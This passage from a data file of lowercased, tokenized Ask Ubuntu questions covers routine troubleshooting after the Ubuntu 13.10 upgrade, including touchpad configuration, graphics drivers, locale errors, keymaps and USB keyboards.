= 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 14 verthysteresis = 14 clickpad = 0 notice that pressuremotionminz , maxtapmove and palmdetect are as specified in xorg.conf , but vertedgescroll and verttwofingerscroll are n't . i can set them temporarily via synclient vertedgescroll=0 and synclient verttwofingerscroll=1 , but these changes are lost when i reboot . what 's the best way of fixing this ?
362349	arm-none-ebai-gcc does not work from mounted directory	i want to build project for arm micro controller . for this purpose in folder with project was placed script , which download toolchain and build him . after run this script toolchain was placed in folder with project . folder with project placed on another logical disk ( which shared between win and linux ) and this disk is mounting each time when i start develop . ( mount by hand ) . when i start make , in terminal i receive error : make [ 3 ] : arm-none-eabi-gcc : command not found the output from echo $ path : /mnt/smoothie-master/gcc-arm-none-eabi/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games the output from whereis arm-none-ebai-gcc : arm-none-ebai-gcc : all binaries files , which are relating to this toolchain are placed in the next directory : /mnt/smoothie-master/gcc-arm-none-eabi/bin/ and has permissions : `` -rwxrwxrwx '' before building this toolchain , i had another similar toolchain ( another version of this ) , but installed through apt-get . and it was removed through apt-get before building new . where is the problem ? thanks !
362354	change reply-to in evolution	i am getting in my inbox on gmail mail from multiple addresses . when i get e-mails in gmail i can choose reply-to address . is there such a possibility in evolution ? i know that in the advanced settings , you can specify the return address for the account , but how to make sure that there was a list of multiple addresses and be able to choose just one ? or maybe there is a possibility that at once expose the return address for letters ?
362355	ubuntu installation does n't work	i wanted to install ubuntu 13.04 on my ( old ) computer . the ram is only about 600 mb . i think ubuntu does n't support so less ram , or does it ? so i have to use lubuntu or xubuntu ?
362356	how to change xrdp port	how can i change the default xrdp port ? i would like to connect from windows7 rdc using other than default port 3389 ?
362359	how do i install moodle ?	i have downloaded the package available on the project website . what steps do i have to follow now ?
362364	wrong resolution/refresh rate output after upgade to 13.10	i have a custom xorg.conf ( need it because my lcd does n't report it 's correct capabilities ) that worked fine in 13.04 but since upgading to 13.10 the lcd is incapable of displaying the output from x . here 's my conf file and my xorg log : http : //pastebin.com/rup3rcn3 what has changed in the upgrade that makes x output a different signal to my lcd with the same conf file as before ?
362366	asus n46vz prouduces more heat when on ubuntu compared to windows	first , i just used ubuntu as my main operating system , so please bear with me . my asus n46vz temps is pretty high when im on ubuntu ( 13.10 ) . the temps are 60c even though i just open a browser . this does not happened on windows , where the temps is just around 50c . i did some research and some people said that the problem might be on my graphic card . i have an intel hd 4000 and gt 650m . so i tried to check my system settings and it said im using `` intel速 ivybridge mobile '' . so , i tried to check the `` additional drivers '' tab on software & update settings but i found nothing there . the point is , i still dont know what make my laptop `` overheating '' . the vga part is just my guess ( and is still dont understand what is the correlation between my vga and the heat , and everything except the temp seems fine ) . any help is appreciated . thanks for your help : d
362369	rename a file case in jfs , case insensitive	i working on a jfs filsystem made with the option -o ( case insensitive filenames ) . how can i easily rename a file from test.txt to test.txt ? using mv report the error : mv : ‘test.txt’ and ‘test.txt’ are the same file and nautilus reports the name “test.txt” is already used in this location . please use a different name . now i can rename it to test2.txt followed by renaming to test.txt
362370	how to connect to a network from terminal	i recently updated to 13.10 from 13.04 . after rebooting , the system dropped into low graphics mode . i had previously configured a wireless broadband connection named : '' evdo connection '' . how do i connect to this network from terminal ? [ note ] i tried using livecd and then the chroot command but then i was unable to make apt-get install any updates . it did not detect the internet connection . additional question , i read somewhere that sudo apt-get update & & sudo apt-get upgrade will resolve the low graphics issue . is that correct ?
362372	new linux kernel in ubuntu ?	i 've been reading about the new 3.12 kernel and i am excited about the increased performance reported by phoronix . how long will it be before ubuntu releases include the 3.12 kernel ?
362373	how to remap key codes without '/usr/lib/keymap ' ( which is gone in saucy , and in trusty , ... ) ?	x11 doesnât see keycodes above 255 , so how to remap those few keys into the gaps below 255 ? /usr/lib/keymap existed in raring , which worked like this : 1 . keys identification : sudo /lib/udev/keymap input/event3 > scan code : 0xc1021 key code : zoomreset = > 100 % > scan code : 0xc101f key code : zoomin = > zoom - > scan code : 0xc1020 key code : zoomout = > zoom + > scan code : 0xc0192 key code : calc = > calculator 2 ) remap keys : sudo /lib/udev/keymap input/event3 0xc1021 phone sudo /lib/udev/keymap input/event3 0xc101f sport sudo /lib/udev/keymap input/event3 0xc1020 shop sudo /lib/udev/keymap input/event3 0xc0192 www it was great , simple and quick ... xmodmap works for keys < 255 like my calculator key ( code 148 ) sudo evtest /dev/input/event3 input driver version is 1.0.1 input device id : bus 0x3 vendor 0x46d product 0xc517 version 0x110 input device name : `` logitech usb receiver '' ... testing ... ( interrupt to exit ) > event : time 1381940761.592647 , type 1 ( ev_key ) , code 140 ( key_calc ) , value 1 = > calculator > event : time 1381940790.224658 , type 1 ( ev_key ) , code 420 ( key_zoomreset ) , value 1 = > 100 % > event : time 1381940810.928667 , type 1 ( ev_key ) , code 419 ( key_zoomout ) , value 1 = > zoom - > event : time 1381940836.216678 , type 1 ( ev_key ) , code 418 ( key_zoomin ) , value 1 = > zoom + **edit : i have found the solution , look this message
362375	black screen after login , after kubuntu upgrade from 13.04 to 13.10	after upgrade from 13.04 to 13.10 i have troubles with xorg - all boot process goes fine , but i have a black screen when xorg starts ( kde starts , and i can hear ac adapter ( dis ) connect sounds ) . trouble is in xorg only , framebuffer console ( ctrl-alt-f2 ) works fine , backlight turns on when i switch to console and turns off again after i switch back to x . all worked fine before release upgrade . i 'm running amd64 version of kubuntu 13.10 on samsung rv508 ( intel i915 graphic , no efi ) notebook . xorg 1.14.3 , kernel 3.11.0-12 update : i have tried to boot using old kernel ( 3.8.0-13 ) and now it 's working fine with that kernel .
362378	possible to use screen lock as timeout ?	what i 'd like to do is lock the screen and have it wait a set amount of time ( eg 20 mins ) before it lets me log back in - so i make myself to have a break from the computer . is it possible to do this ? thanks edit : thanks for the suggestions - but i do n't actually want something to remind me to take scheduled breaks . more something i can click when i realise i 'm getting distracted and it 'll immediately lock the screen for a fixed amount of time . or even just lock screen if i can find a way to stop it letting me log in for 20 mins or so .
362379	need help to sort out partitions with mac os x + ubuntu dual boot	i have a macbookpro8,1 with a 500gb hdd , running os x 10.8.5 mountain lion . i used the disk utility app on mac os to create a new 50gb free space partition to install ubuntu on . i installed refit and live booted from a cd with ubuntu 13.04 on it . while live booting i used gparted to create a swap area of 1gb and formatted the remaining free space as ext4 . these two were /dev/sda4 and /dev/sda5 respectively . the ext4 was flagged as the boot loader ( grub ) partition . then , i installed ubuntu on the ext4 through the desktop icon while live-booting from cd with no problems . after the installing was finished , i rebooted the laptop , the cd popped out , and i got to the refit boot loader screen . i selected the `` partition tool '' from the menu and refit said it successfully synced my partitioning tables . i shut down the computer , turned it back on , got to the refit screen again and now i had two options : boot mac os and boot ubuntu from hd . whenever i try to boot into ubuntu , i get a white screen with the linux penguin greyed out in the middle , and after a few seconds a black screen with the text `` missing operating system ... '' i suspect there is a problem with the partition tables , but i do n't know how to fix it . if anyone can help i can include the report from the partition inspector tool that came with refit . any help would be greatly appreciated !
362381	xubuntu 13.10 laptop display pop up from sleep ?	upgraded to xubuntu 13.10 recently and noticed that when i put my dell d620 laptop to sleep/hibernate ( closed lid ) the laptop display & configure settings & layout pop up appears ? this does n't happen if i activate hibernate/suspend from the menu just when i close the lid ... ... ..any ideas anyone ? ? regards , david
362382	how to change the ubuntu touch calendar to hijri ?	i want to change the calendar to hijri calender in the ubuntu-phone . how to change those month settings ?
362383	ubuntu 13.10 lost layout switch shortcut	after upgrading to ubuntu 13.10 , my keyboard layout switch shortcut not functioning any more . i used to use capslock key . i tryed to redefine it but could not find any . the layout option settings page has changed and it does not seem to have any possibility to define the short cut . i heavily rely on this feature and it is a pain that each time i need to take mouse on control panel language icon to switch layout . really appreciate if you help me to resolve this .
362384	ubuntu 13.04 does n't support amd radeon hd 8550g ?	i have a laptop with amd radeon hd 8550g as its video card and i 'm currently using ubuntu 13.04 . i tried to install its drivers but it says not supported . what can i do with this ? does 13.10 supports it already ?
362387	how to create two partitions ?	i have a 80gb hdd with one partition for ubuntu and want to partition it into two partitions 60g/20g . how can i do this ?
362388	upgrade : upgradation failed,13.10 issue	i was upgrading 13.04 to 13.10.and suddenly it hanged and upper part of the screen went black . so i stopped the upgradation and unfortunately i forcefully shutdown.but its already upgraded to 13.10 ( i feel upgradation is not complete though ) problems the desktop flickers now and sometimes the screen turns black . sound stopped.no sound output detected in sound settings.and the shutdown button also not working . is there a way to upgrade it again to 13.10 ( completely ) ?
362389	upgrading from 13.04 to 13.10 stops	the upgrade to 13.10 stops after a lot of error messages about texlive packages , that i could close . the upgrade goes then further , but now it is stopped . what can i do to initiate the process again ? the following are the last messages from the command window . : g multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 47 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 47 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 47 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 47 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 59 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 59 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 59 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 59 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 59 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 72 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 86 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 86 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 86 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 98 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 98 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 109 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 116 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 130 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 138 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 146 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 157 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 157 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 157 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 157 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 165 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 173 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 182 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/30-cjk-aliases.conf '' , line 182 : having multiple < family > in < alias > is n't supported and may not work as expected fontconfig warning : `` /etc/fonts/conf.d/99-language-selector-zh.conf '' , line 11 : having multiple values in < test > is n't supported and may not work as expected error : error ( 'unpack requires a bytes object of length 4 ' , ) ( apport-gtk:16828 ) : gtk-critical ** : gtk_main_quit : assertion 'main_loops ! = null ' failed
362392	ca n't play drm-protected content in ubuntu 13.10	i ca n't play drm-protected content from online movies in ubuntu 13.10 . anything that work before as workaround not work anymore . i tried reinstall adobe flash player - still not working .
362397	ubuntu 13.10 login loop	after typing my password it starts to load but then comes right back to login screen . i tried ctrl+alt+f_ but it does n't work too , the screen gets black and after a while returns to the login screen . it seems related to the ati driver that i installed , if i could somehow remove it should be worth trying . but without being able to log in or reach the shell how will i do it ? re-installing the system is not an option for me .
362401	running dota 2 on nvidia optimus system	i have asus n56vb with geforce 740 m and i just installed ubuntu 13.10 , bumblebee with proprietary nvidia 319 driver , steam and dota 2 . i can succesfully launch steam without optirun and with `` optirun -b primus '' , but ca n't launch it with just optirun - here is console output . as i understand the main problem is primus : fatal : failed to load any of the libraries : /usr/lib/nvidia-319-updates/libgl.so.1 : /usr/lib32/nvidia-nvidia-319-updates/libgl.so.1 /usr/lib/nvidia-319-updates/libgl.so.1 : incorrect class elf : elfclass64 /usr/lib32/nvidia-nvidia-319-updates/libgl.so.1 : unable to open shared object : no such file or catalogue then , if i open steam , i can launch dota 2 , but i think it uses integrated video card ( because i need to set all graphics options to minimal to get around ~40 fps ) . if i set `` optirun -b primus % command % '' or `` optirun % command % '' it does n't launches at all . so what should i do to make dota 2 execute on nvidia card ? here is my /etc/bumblebee/bumblebee.conf
362402	usb keyboard does not load after 13.10 upgrade	problem : running kernel 3.11.0-12-generic after a ubuntu upgrade from 13.04 to 13.10 my usb keyboard is not recognised , thus i am not able to unlock my encrypted disk . i suspect it might be related to a minimal/incorrect install of initrd . question : how do i go about getting the newest kernel to recognise my generic usb keyboard , allowing me to unlock my encrypted disk ? what i have tried : i have already re-installed the newest kernel : sudo apt-get install -- reinstall linux-image-generic linux-image and i have also updated the initrd : update-initramfs -c -k 3.11.0-12-generic back story : i just completed upgrading my ubuntu system from 13.04 to 13.10 . when i subsequently rebooted by system i was no longer able to enter my encryption password ( passphrase ) as the keyboard drivers did not load . temporary workaround : earlier in the boot process ( before the keyboard stops working ) i was able to enter grub menu were i choose to boot from an older kernel ( 3.8.0-31-generic ) which did load the usb keyboard drivers . this is currently the kernel i am running . thanks
362403	how to create a new logind session while running xinit from the console ?	my current system boots to console and i do not want to use a display manager . after updating to ubuntu 13.10 , i realised that the consolekit is no longer used for managing user logins and systemd-logind service is used instead . my .xinitrc config for ubuntu 13.04 looked like this : exec ck-launch-session startxfce4 the ck-launch-session enabled me to mount disks or shutdown/reboot/suspend the pc . the only place where i could find documentation for how to enable these features was in the documentation for arch linux : users should first set up systemd-logind to manage their session . if systemd is running as the system init daemon , then this is already happening . next , the user must launch systemd by putting the following in their ~/.xinitrc : /usr/lib/systemd/systemd -- user the user should remove any instances of ck-launch-session or dbus-launch from their ~/.xinitrc , as those commands are unneeded . however , as ubuntu uses upstart and not the systemd , i ca n't do that on my configuration . i tried doing something similar so i put this in my .xinitrc : export desktop_session=xfce init -- user and the xfce session starts , but i 'm still not able to mount the hard disks or reboot , shutdown and suspend my pc . it 's effectively the same as calling startxfce4 directly . if i start the x server with the vt01 argument , where 01 is the id of the current tty , everything works fine , but i ca n't use stuff like ctrl+c to terminate the server if something hangs . yes , there are workarounds like calling killall xinit , but this does n't solve the problem . i think that i 'm not allowed to do shutdown if i start the x server in a new tty is because a new logind session is not cretated . after reading the logind documentation , i realize that i probably need to create a new session upon starting the x server and that session should be marked as active when i 'm in the x server . this can be checked with the following command : loginctl show-session $ xdg_session_id | grep active the following line in the logind documentation confuses me : createsession ( ) and releasesession ( ) may be used to open or close login sessions . these calls should never be invoked directly by clients . creating/closing sessions is exclusively the job of pam and its pam_systemd module . so my question is how can i make pam create a new logind session upon starting the x server ?
362409	toshiba satellite u400 kernel 3.10 3.11 3.12 cpu fan	after switching to any kernel above 3.9.11 my cpu cooler acts like cpu was overheating , it spins all the time trying to cool down processor even if it 's below 50 celcius . i do n't think it 's the distro problem as tested on other livecd with krnl 3.10 . the current os is ubuntu 13.10 64 bit , toshset installed by default but wo n't work because lack of toshiba kernel module . bios quite old 10/25/2010 but latest v4.70 and the model is toshiba satellite u400 psu40e with intel core 2 duo cpu t5750 i 'd like to keep updated my rusty laptop and really appreciate any suggestions .
362415	lenovo x220 i7 ubuntu 13.10	i am thinking about switching back to the newest ubuntu 13.10 on my x220 . i had different ubuntu releases installed before and quite liked it . main problem was always the power management of the i7 cpu . after looking around different ubuntu and thinkpad communities i am still not sure if the problem has been solved with this - or previous releases . will there still be any known problems with the power saving / cpu throtteling / fan control on x220â´s with i7 cpu ? ?
362420	is it just me or are the gedit plugins in 13.10 incomplete ?	the update went smooth but all my saved sessions from gedit in 13.04 are gone . i 'm trying to figure out if those just were n't ready for prime time and were left out or if this is a system problem . when i go to preferences plugins , i do n't see the session listed as a plugin to enable .
362422	is the ubuntu.com website open source ?	if i wanted to make a local ubuntu website is there anything that i can use ? or a design like this website has , could also be a wordpress design like this website has http : //ubuntudanmark.dk/
362424	13.10 64 bit - lightscribe drive not recognised in lacie 4l	since there is seemingly no better alternative i 've managed to ( force ) install the 32-bit lightscribe host software and lacie 4l labeller in 64-bit ubuntu 13.10 by copying people 's instructions found through various google searches ( eg : http : //wiki.birth-online.de/know-how/software/linux/lightscribe ) but still the 4l labelling software completely fails to recognize my ( usb ) lightscribe drive even after applying the fix recommended here : install lightscribe on 64 bit amd error the software worked fine on 13.04 on my previous ( now dead ) 32-bit desktop . i found older posts for appears to be the same problem in previous ubuntu builds such as this one : http : //ubuntuforums.org/showthread.php ? t=1350415 , but i guess the 13.10 folder architecture must be different or something because if i try the steps there i get , eg , `` target â/usr/lib32/â is not a directory : no such file or directory '' . could anyone please help ?
362431	what ip address does ubuntu assign itself when it can not reach a dhcp server ?	when windows is attached to a network but can not reach a dhcp server , it defaults to an ip address of the form 169.254.xxx.xxx . does ubuntu do something similiar ?
362437	`` kernel panic - not syncing : no init found . try passing init = option to kernel '' after installing ubuntu with uefi	i decided to install ubuntu 12.04 lts second system with windows 7 , uefi . made a liveusb , downloaded , started the installation . the installer showed four sections , one for efi already existed ( windows loader seems named , 100 mb ) , the other three , ntfs . one of them i erased ( of course , partition with windows i saved ) , and created two partitions - swap and / . the installation was successful , no errors . but after the reboot comes to grub , the choice of windows 7 again returns to the grub , when choosing ubuntu - gives black screen with error : [ 1.310472 ] kernel panic - not syncing : no init found . try passing init = option to kernel . see linux documentation / init.txt for guidance . besides , now will not ship liveusb .
362438	how to make a custom keyboard layout ?	can i create a new keyboard layout or add unicode characters to my current keyboard layout in ubuntu ? i have found something called kmfl ( keyboard mapping for linux ) , however , i could not install it because i could not find the package ibus-kmfl . is there maybe an easier way create a new keyboard layout ? something as easy as the the microsoft keyboard layout creator ?
362439	dell vostro 3460 , from ubuntu 11.04 to 12.04 no ethernet	i 've just upgraded ubuntu on my dell vostro 3460 to the 12.04 . 64 bit version . now the ethernet connection does n't work anymore . wifi is working . someone had this problem ? lspci -nn | grep 0200 : 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) ubuntu 12.04 64 bit
362441	msi hd7970 vs ubuntu	i had ubuntu 13.04 installed , it works fine with all my hardware except my video card msi hd7970 . with the default drivers i could n't setup a 2nd monitor so i installed ati 's official driver . it worked for a while but then started to crash so i upgraded to ati 's beta driver . also worked for a while until yesterday i restarted my pc and now it wo n't even log in . what are you experiences on running ubuntu with ati video cards ? what about dual monitors ? for me it never worked well , with some animations slowing down and bad overall experience . having tried both default and manufacturer 's driver i 'm now wondering is this fixable ?
362442	creating account	i 'm trying to setup an account with ubuntu one and the software ask to type a word to continue , but that word is not visible , then when i click on create account , the software hangs on `` creating account , please wait '' what is the problem ?
362447	how to configure clickpad ?	i am running xubuntu 13.10 on a lenovo thinkpad x1 carbon . it works very well , except the behaviour of my clickpad ( touchpad where the buttons are built into the surface ) makes it essentially unusable . the default behaviour means that the whole area of the clickpad moves the mouse cursor , so that when i try and click anything , the mouse will move around slightly and i will miss my target . after googling around , i saw suggestions suggesting that i should modify my /etc/x11/xorg.d/50-synaptics file ( man ) so that the areabottomedge option is set to the height of the button area on my clickpad . this worked in that it prevented the mouse from moving when i touch the clickable area , but it now does not allow me to move the mouse with another finger while holding the left click button down , so i can not do selections/dragging/etc . what i am after is configuration settings ( or a different driver ) that will turn off mouse movement over the clickable area of the clickpad , but still allow me to move the mouse while another finger is resting on , or clicking down on the clickable area . essentially i want to make the clickable areas act like real buttons . thank you .
362448	how can i install adobe air on 12.04 64-bit ?	any solution is not do anything on my machine . i downloaded air installed 32 bit packages but always said `` permission denied ''
362449	persistent locale-related errors and crashes	i 've just installed ubuntu 13.10 on my chromebook via chrubuntu , which does n't appear to have set up locales correctly . my attempts to do so myself are failing . the system should be en_gb in utf-8 mode . the output of locale -a includes en_gb.utf8 . locale outputs the following : locale : can not set lc_all to default locale : no such file or directory lang=en_gb.utf-8 language=en_gb : en lc_ctype=en_gb.utf8 lc_numeric=en lc_time=en lc_collate=en_gb.utf8 lc_monetary=en lc_messages=en_gb.utf8 lc_paper=en lc_name=en lc_address=en lc_telephone=en lc_measurement=en lc_identification=en lc_all= various programs throw locale-related errors , mostly non-fatal , for example : ( process:2711 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . however , i 'm also getting crashes at bootup from keyboard input methods and when attempting to use the language support section of system settings . at present , my /etc/default/locale file reads as follows , which was copied from the locale output on a working system ( though i might have made one or two changes since then ) : lang=en_gb.utf8 language= lc_ctype= '' en_gb.utf8 '' lc_numeric= '' en_gb.utf8 '' lc_time= '' en_gb.utf8 '' lc_collate= '' en_gb.utf8 '' lc_monetary= '' en_gb.utf8 '' lc_messages= '' en_gb.utf8 '' lc_paper= '' en_gb.utf8 '' lc_name= '' en_gb.utf8 '' lc_address= '' en_gb.utf8 '' lc_telephone= '' en_gb.utf8 '' lc_measurement= '' en_gb.utf8 '' lc_identification= '' en_gb.utf8 '' lc_all= at various points trying to fix this , i 've managed to cause apt to throw 400 errors when trying to run apt-get update , and render the system entirely unbootable by causing mountall to crash . i 've tried various solutions i 've found by googling the problem , including running locale-gen and dkpg-reconfigure locales , with no luck . what 's going on and how can i fix it ? edit : so setting lc_all=en_gb.utf8 fixes the local issues , but it causes a pile of error messages when i try and ssh into other machines that do n't have en_gb.utf8 available . this does n't happen on my other ubuntu boxes , so there must be a way of getting the local settings sorted without setting lc_all and causing these issues .
362450	ubuntu 13.10 - no usb devices after restart	i have a fresh install of ubuntu 13.10 . i was trying to install wine and it hung up so i decided to restart the computer instead of killing processes at random ( no , i did n't kill any processes ) . after reboot the keyboard ( usb ) does n't function so i ca n't log in . usb wireless adapter is also down as is the usb mouse . i then installed 13.04 on side and it works just fine . now the question is , how do i fix the 13.10 installation or should i just delete it and install 13.04 in it 's place ?
362452	oss radeon driver s-video color output rainbow flickers ( sapphire 4850x2 )	after much effort i finally got s-video to display at all . now i have an issue where the image is stable but the color is like rainbows and flickers . it is not b/w . tv standard is already set properly to ntsc . this works perfectly fine in windows ( all versions ) . google seems unable to help me . i can make a video if it helps .
362455	how to get rid of light desktop manager entry in ubuntu greeter	i 've got a `` light desktop manager '' entry in ubuntu greeter for some strange reason , and i ca n't get rid of it . as the current os is ubuntu 13.10 the way to configure the lightdm greeter is rather strange , and i ca n't find any solution in greeter configs . a more annoying thing is that ldm seems to have password very hard to guess so i ca n't login to this `` account '' . can you help me to find what is causing this problem and find the solution ?
362457	black elements in the desktop	i have just upgraded to 13.10 . some elements of the desktop are black : * notifications * window borders * the terminal ( just a black area , it 's working but i ca n't see anything ) * tooltips in chrome browser i ca n't tell much more about it , it might be related to my graphic card ? i 'm on a dell xps 13 . i raised a bug , and i know this is a duplicate but i feel that 's a real problem with driver or window management . any help will be appreciated .
362461	low graphics and laggy screen after update to 13.10 from 13.04	after updating from 13.04 to 13.10 many of 3d unity stuff has stopped working , i am suing samsung series 3 ( np350v5x ) laptop which has switchable intel and amd radeon hd 7670m gfx . xserver-xorg-video-ati does works but no 3d support and graphics are very low . [ i am currently using this ] fglrx & fglrx-updates shows blank screen after login . intel graphic install does n't work either ( dependency error ) output of $ sudo lshw -c video *-display description : vga compatible controller product : thames [ radeon hd 7500m/7600m series ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:45 memory : e0000000-efffffff memory : c0120000-c013ffff ioport:3000 ( size=256 ) memory : c0100000-c011ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : bfc00000-bfffffff memory : d0000000-dfffffff ioport:4000 ( size=64 ) similarly $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) opengl version string : 2.1 mesa 9.2.1 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no shows no 3d support . can anyone please guide how to make things working again . update : issue fixed now , after updating to latest ubuntu binary for ati . ( https : //help.ubuntu.com/community/binarydriverhowto/ati ) output of $ /usr/lib/nux/unity_support_test -p is , opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 7600m series opengl version string : 4.2.12337 compatibility profile context 13.101 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
362462	why do the gnome extensions restart after restarting the system ?	i 've got a problem with the shell extensions ( i only use a few , such as autohide battery when charging and skype shell extension ) , namely that after system restart i have to turn them on again manually . is there any solution for this ? thanks !
362465	skype video not working 13.04 & 13.10 ?	i am trying to fix the issue with the video calls . i can check the video from the option menu , it works fine . but it does not work while calling someone . it shows video disabled . how can i fix this issue ? i am using ubuntu 13.10 and skype version 4.2.0.11 i checked all sites including below links but could not find solution : skype no video in 13.04 skype video call not working ubuntu 11.10 no video skype found video does n't work well in skype http : //www.youtube.com/watch ? v=wealczb4qy8
362468	ubuntu software center wo n't load after upgrading to oneiric	uname -a 3.2.0-54-generic # 82-ubuntu smp tue sep 10 20:09:12 utc 2013 i686 i686 i386 gnu/linux software-center error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 171 , in _get_distro distro_class = getattr ( module , distro_id ) attributeerror : 'module ' object has no attribute 'debian' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 140 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 50 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 171 , in _get_distro distro_class = getattr ( module , distro_id ) attributeerror : 'module ' object has no attribute 'debian'
362470	fix plymouth with nvidia driver in ubuntu 13.10	using the nvidia driver , how can plymouth be fixed in ubuntu 13.10 ( saucy salamander ) ? in other versions there was a script that fixed it , but it is not working in ubuntu 13.10 and package hwinfo is missing , but with free drivers it is not the case .
